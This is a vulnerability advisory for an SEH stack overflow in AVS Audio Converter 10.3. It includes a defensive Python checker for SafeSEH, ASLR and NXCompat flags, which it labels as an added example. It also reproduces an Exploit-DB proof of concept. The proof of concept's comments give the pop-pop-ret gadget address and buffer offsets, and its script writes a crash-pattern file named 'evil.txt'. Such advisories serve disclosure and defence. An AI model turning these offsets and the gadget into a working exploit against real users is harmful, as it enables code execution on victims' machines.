Vendor: AVSAudioConverter
By: Yehia Elghaly - Mrvar0x
CVSS: 7.8 (HIGH)
Vulnerability Type: Stack Overflow
CWE: 119
Product Name: AVSAudioConverter
Affected Version From: 10.3
Affected Version To: 10.3.1.633
Patch Exists: NO
Related CWE:
CPE: AVSAudioConverter.exe
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Professional x86
2022

AVS Audio Converter 10.3 – Stack Overflow (SEH)

AVS Audio Converter 10.3 is vulnerable to a stack overflow caused by improper bounds checking of user-supplied input. An attacker can exploit it by crafting a malicious file and sending it to the victim, which can lead to arbitrary code execution on the victim's system. The vulnerable module is AVSAudioConverter.exe, which has SafeSEH disabled. In the overflowing buffer, the 4-byte nSEH field sits directly before the 4-byte SEH field. The exploit file can be generated with Python 2.7.x on Linux.

Mitigation:

The vendor should ensure proper bounds checking of user-supplied input to prevent stack overflow vulnerabilities.
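
A defender-side check for the condition noted above (a module built without SafeSEH, ASLR or NXCompat), as an added example that is not part of the original advisory or exploit: it reads a PE32 header and reports those three flags. The names `pe32_mitigations` and `build_sample` are hypothetical, the sample image is constructed inline, and the SafeSEH result is a heuristic based on the Load Config handler table.

```python
import struct

ASLR, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400   # DllCharacteristics bits

def pe32_mitigations(data):
    """Report ASLR / NXCompat / SafeSEH for a 32-bit PE image held in bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe, = struct.unpack_from("<I", data, 0x3C)               # e_lfanew
    opt = pe + 24                                            # optional header
    if data[pe:pe + 4] != b"PE\0\0" or data[opt:opt + 2] != b"\x0b\x01":
        raise ValueError("not a PE32 (32-bit) image")
    nsec, = struct.unpack_from("<H", data, pe + 6)
    optsize, = struct.unpack_from("<H", data, pe + 20)
    flags, = struct.unpack_from("<H", data, opt + 70)        # DllCharacteristics
    lc_rva, _ = struct.unpack_from("<II", data, opt + 176)   # data directory 10: Load Config
    handlers = 0
    for i in range(nsec):                                    # map the RVA to a file offset
        va, rawsize, rawptr = struct.unpack_from("<III", data, opt + optsize + 40 * i + 12)
        if lc_rva and va <= lc_rva < va + rawsize:
            off = lc_rva - va + rawptr
            if struct.unpack_from("<I", data, off)[0] >= 72:  # Size covers the SEH fields
                table, count = struct.unpack_from("<II", data, off + 64)
                handlers = count if table else 0
    # Heuristic: protected if the image opts out of SEH or registers a handler table
    return {"ASLR": bool(flags & ASLR), "NXCompat": bool(flags & NX_COMPAT),
            "SafeSEH": bool(flags & NO_SEH) or handlers > 0}

def build_sample(flags, seh_handlers):
    """Constructed minimal PE32 header with one section; demo input, not a real binary."""
    img = bytearray(0x400)
    img[0:2], img[0x80:0x84] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x80)                  # e_lfanew
    struct.pack_into("<HH", img, 0x84, 0x14C, 1)             # i386, one section
    struct.pack_into("<H", img, 0x94, 224)                   # SizeOfOptionalHeader
    opt = 0x98
    struct.pack_into("<H", img, opt, 0x10B)                  # PE32 magic
    struct.pack_into("<H", img, opt + 70, flags)
    struct.pack_into("<II", img, opt + 176, 0x1000, 72)      # Load Config directory
    struct.pack_into("<III", img, opt + 224 + 12, 0x1000, 0x200, 0x200)  # section VA/size/ptr
    struct.pack_into("<I", img, 0x200, 72)                   # load config Size
    if seh_handlers:
        struct.pack_into("<II", img, 0x200 + 64, 0x401000, seh_handlers)
    return bytes(img)

if __name__ == "__main__":
    print("unprotected:", pe32_mitigations(build_sample(0, 0)))
    print("hardened:   ", pe32_mitigations(build_sample(ASLR | NX_COMPAT, 3)))
```

To audit an installed binary, pass the bytes of the file on disk to `pe32_mitigations` in place of the constructed sample.
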

Exploit-DB raw data:

# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86

#pop+ret Address=005154E6
#Message=  0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)

# The only module that has SafeSEH disabled.
# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
# 0x00400000 | 0x01003000 | False  | False   | False |  False   | False  |

#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.

#Buffer  = '\x41'* 260
#nSEH    = '\x42'*4
#SEH     = '\x43'*4
#ESI     = 'D'*44 # ESI Overwrite

#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44


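# Reproduce:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' and copy its contents.
# Paste at 'Output Folder' and click 'Browse'.

#!/usr/bin/python

filename = "evil.txt"

# 260 filler bytes, then nSEH (4 bytes), SEH (4 bytes) and 44 trailing bytes (ESI overwrite)
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44

# Write the pattern to disk; the file is closed when the block exits
with open(filename, 'w') as textfile:
    textfile.write(buffer)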